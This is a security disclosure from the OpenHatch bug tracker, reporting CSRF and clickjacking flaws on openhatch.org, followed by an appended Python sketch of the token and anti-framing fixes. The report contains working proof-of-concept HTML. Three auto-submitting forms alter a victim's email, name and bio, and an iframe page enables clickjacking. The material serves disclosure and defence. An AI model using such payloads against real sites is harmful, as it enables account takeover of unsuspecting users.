
[OH-Dev] [issue917] CSRF and clickjacking vulnerability at openhatch.org

pik4chu bugs at openhatch.org
Sat Jan 11 16:36:45 UTC 2014


New submission from pik4chu <jeroldcamacho.res at gmail.com>:

Hey Guys,
I found a vulnerability at your site,
Cross-site Request Forgery (CSRF) and Clickjacking vulnerability

Description:
Cross-site request forgery, also known as a one-click attack or session riding
and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website
whereby unauthorized commands are transmitted from a user that the website trusts.

Impact:
The impact of this can be anything from creating new data--which may be an
outright defacement, contain disinformation or direct users to another malicious
website--to deleting or altering existing data.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
  <body onload="javascript:document.forms[0].submit()">
    <form action="http://openhatch.org/account/settings/contact-info/do" method="POST">
      <input type="hidden" name="edit&#95;email&#45;email" value="jeroldcamacho&#46;res&#64;gmail&#46;com" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
  <body onload="javascript:document.forms[0].submit()">
    <form action="http://openhatch.org/account/settings/edit_name_do" method="POST">
      <input type="hidden" name="first&#95;name" value="CSRF" />
      <input type="hidden" name="last&#95;name" value="CSRF" />
      <input type="hidden" name="username" value="CSRF" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
  <body onload="javascript:document.forms[0].submit()">
    <form action="http://openhatch.org/people/info/edit/do" method="POST">
      <input type="hidden" name="edit&#45;tags&#45;bio" value="Cross&#45;site&#32;Request&#32;Forgery" />
      <input type="hidden" name="edit&#45;tags&#45;homepage&#95;url" value="" />
      <input type="hidden" name="edit&#45;tags&#45;irc&#95;nick" value="" />
      <input type="hidden" name="edit&#45;tags&#45;understands" value="" />
      <input type="hidden" name="edit&#45;tags&#45;understands&#95;not" value="" />
      <input type="hidden" name="edit&#45;tags&#45;studying" value="" />
      <input type="hidden" name="edit&#45;tags&#45;can&#95;pitch&#95;in" value="" />
      <input type="hidden" name="edit&#45;tags&#45;can&#95;mentor" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

To fix the CSRF, you must add an auth token to every HTML form on your site :)


I FOUND A CLICKJACKING VULNERABILITY TOO
~~~~~~~~~~~~~~~~~~~~~
<html>
  <style>
    iframe {
      width: 800px;
      height: 500px;
      position: absolute;
      top: 0; left: 0;
      filter: alpha(opacity=50);
      opacity: 0.5;
    }
  </style>
  <iframe src="http://openhatch.org/"></iframe>
</html>

----------
messages: 4039
milestone: later
nosy: paulproteus, pik4chu
priority: critical
status: testing
title: CSRF and clickjacking vulnerability at openhatch.org

__________________________________________
Roundup issue tracker <bugs at openhatch.org>
<https://openhatch.org/bugs/issue917>
__________________________________________
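
The two fixes the report asks for, sketched as an added example that is not part of the original message and is not OpenHatch's code: a session-bound token required on every state-changing POST, and anti-framing response headers. The function names, the `csrf_token` field name and the session identifiers are assumptions made for illustration.

```python
import hashlib
import hmac
import html
import secrets
from typing import Optional, Tuple

# Assumption: a per-deployment secret that never leaves the server.
SERVER_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session; a third-party page cannot read or guess it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def render_form(session_id: str, action: str) -> str:
    """Every state-changing form carries the token as a hidden field."""
    token = issue_csrf_token(session_id)
    return (f'<form action="{html.escape(action, quote=True)}" method="POST">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input type="text" name="first_name"></form>')

def security_headers() -> dict:
    """Anti-framing headers sent on every response (the clickjacking fix)."""
    return {"X-Frame-Options": "DENY",
            "Content-Security-Policy": "frame-ancestors 'none'"}

def handle_post(session_id: Optional[str], form: dict) -> Tuple[int, dict]:
    """Return (status, headers); refuse POSTs without a valid session-bound token."""
    headers = security_headers()
    if session_id is None:
        return 401, headers
    supplied = str(form.get("csrf_token", ""))
    expected = issue_csrf_token(session_id)
    # Constant-time comparison so the check leaks nothing about the token.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, headers  # an auto-submitted cross-site form ends up here
    return 200, headers      # token matches this session: apply the change

# Constructed sample requests (not real traffic).
VICTIM_SESSION = "constructed-session-id-1"
FORGED = {"first_name": "CSRF", "last_name": "CSRF", "username": "CSRF"}
LEGIT = {"first_name": "Ada", "csrf_token": issue_csrf_token(VICTIM_SESSION)}

if __name__ == "__main__":
    print("forged POST ->", handle_post(VICTIM_SESSION, FORGED)[0])
    print("legit POST  ->", handle_post(VICTIM_SESSION, LEGIT)[0])
    print("headers     ->", security_headers())
```

The browser still attaches the victim's session cookie to the forged request, which is why the check depends on a value that only a page served by the site itself can contain.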

